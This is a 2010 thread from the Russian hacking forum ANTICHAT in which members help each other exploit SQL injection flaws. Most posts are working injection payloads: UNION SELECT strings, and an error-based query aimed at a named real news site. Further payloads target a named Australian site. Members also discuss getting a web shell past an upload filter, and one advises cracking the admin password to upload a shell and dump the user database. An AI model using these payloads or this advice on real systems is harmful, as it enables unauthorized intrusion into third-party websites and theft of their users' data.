HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.06.2010, 00:06
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами: 8603287

Репутация: 87
По умолчанию

Цитата:
Сообщение от durito  
вопрос такой:
есть стандартная скуль, подобрано количество полей, но при попытке вывести данные путем ввода некорректного значения id
index.php?id=-37+union+select+1,2/*
index.php?id=3111117+union+select+1,2/*
index.php?id=37+and+1=2+union+select+1,2/*
скрипт жалуется на некорректное значение id. есть еще какие-то способы или придется крутить вслепую?
попробуй типа этого...

index.php?id=-37)/**/and/**/1=2/**/uNion+all+seLect+null,null+from+information_schema .tables+limit+0,1/*

есле 5тая версия.. а не какайта там 3-тья иле четвертая..

и вообще тут уже многие говорили по 100 раз, никто не любит гадать, любо линк в студию либо надейся сам на удачу, и вообще версию хотя б сказал.

-> +AND+substring(version,1,1)=5
 
Ответить с цитированием

  #2  
Старый 24.06.2010, 02:25
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами: 9594385

Репутация: 386
По умолчанию

[Feldmarschall], нет, я понимаю конечно лето, мозги совсем плавятся, но как твой пример запроса поможет в вопросе дурито ? И кэп подсказывает что и так про блинд метод знает, но хочет добиться вывода.

durito, в голову приходит мысль попробовать помутить ченить с условиями типа такого

index.php?id=37+and+if(5=4,NULL,NUll)+union+select +1,2/*

но мне почему то кажется что все равно ничего не получится, и оно равносильно этому запросу

index.php?id=37+and+1=2+union+select+1,2/*
 
Ответить с цитированием

  #3  
Старый 24.06.2010, 03:03
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

[QUOTE="Konqi"]
ребят не могу залить шелл, в админке есть место для загрузки картинок,но стоит хороший фильтр и на стороне сервера и на JS..
при загрузке php файла вылетает aкошка JS и говорит что нельзя этот формат и тп, но файл все же загружается, но когда иду по линку файла то виден только один символ и пустая страница
то есть если контент файла
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
то на странице видна только символ '[/COLOR][/COLOR]
[/PHP]
то на странице видна только символ '
 
Ответить с цитированием

  #4  
Старый 24.06.2010, 06:34
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами: 9204308

Репутация: 256
По умолчанию

Цитата:
Сообщение от durito  
вопрос такой:
есть стандартная скуль, подобрано количество полей, но при попытке вывести данные путем ввода некорректного значения id
index.php?id=-37+union+select+1,2/*
index.php?id=3111117+union+select+1,2/*
index.php?id=37+and+1=2+union+select+1,2/*
скрипт жалуется на некорректное значение id. есть еще какие-то способы или придется крутить вслепую?
Понасоветовали тебе тут чёто не то ребята, ясно же сказано, ругается скрипт на несуществующее значение. Ну давай рассмотрим вот такой естественный способ продолжения логики основного запроса:

index.php?id=37+limit+0+union+select+1,2/*

Ну или так:

index.php?id=37+union+select+1,2+limit+1,1/*
 
Ответить с цитированием

  #5  
Старый 24.06.2010, 09:41
k2b1~
Новичок
Регистрация: 17.06.2010
Сообщений: 0
С нами: 8369816

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
http://www.nortun.am/pages.php?al=news&pid=1&id=568%27&act=more
вот поjaлсута помоqите раскрутить..

как то не получается
 
Ответить с цитированием

  #6  
Старый 24.06.2010, 11:29
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Цитата:
Сообщение от k2b1~  
вот поjaлсута помоqите раскрутить..
как то не получается
Код:
http://www.nortun.am/pages.php?al=news&pid=1&id=568'+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+sed_zpages+group+by+2+limit+1)a)--+&act=more
 
Ответить с цитированием

  #7  
Старый 24.06.2010, 11:52
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами: 9436363

Репутация: 55
По умолчанию

Цитата:
Сообщение от DrAssault  
Понасоветовали тебе тут чёто не то ребята, ясно же сказано, ругается скрипт на несуществующее значение. Ну давай рассмотрим вот такой естественный способ продолжения логики основного запроса:
index.php?id=37+limit+0+union+select+1,2/*
Ну или так:
index.php?id=37+union+select+1,2+limit+1,1/*
http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80/*

в первом случае The profile is not active!

во-втором тоже самое

http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80+limit+0,1/*

проходит, но толку
 
Ответить с цитированием

  #8  
Старый 24.06.2010, 12:05
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от durito  
http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80/*
в первом случае The profile is not active!
во-втором тоже самое
http://www.soulmades.com.au/index.php?ap=2956775+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,5 9,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75, 76,77,78,79,80+limit+0,1/*
проходит, но толку
версия базы 4.0.21-log так что все равно брутом надо табелки подбирать
 
Ответить с цитированием

  #9  
Старый 24.06.2010, 12:21
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами: 9436363

Репутация: 55
По умолчанию

Gorev брутом тянуть базу юзеров это анреал
 
Ответить с цитированием

  #10  
Старый 24.06.2010, 12:25
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от durito  
Gorev
брутом тянуть базу юзеров это анреал
что бы тебе тянуть брутом базу юзверей..тебе надо добратся до таблички и до колонок сперва... так как я сказал что версия базы 4-я и информатион схемы нет..так что подбери сначала имена табличек и колонок нужные..и только потом думай про дамп базы...вариантов несколько..ты подбираешь пасс админа и через админку заливаешь шелл ..а там уже и доступ прямой к базе..либо используешь какую нибудь тулзу для скулей..например сипт или что быстрее будет, тулзу от Пашкелы...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.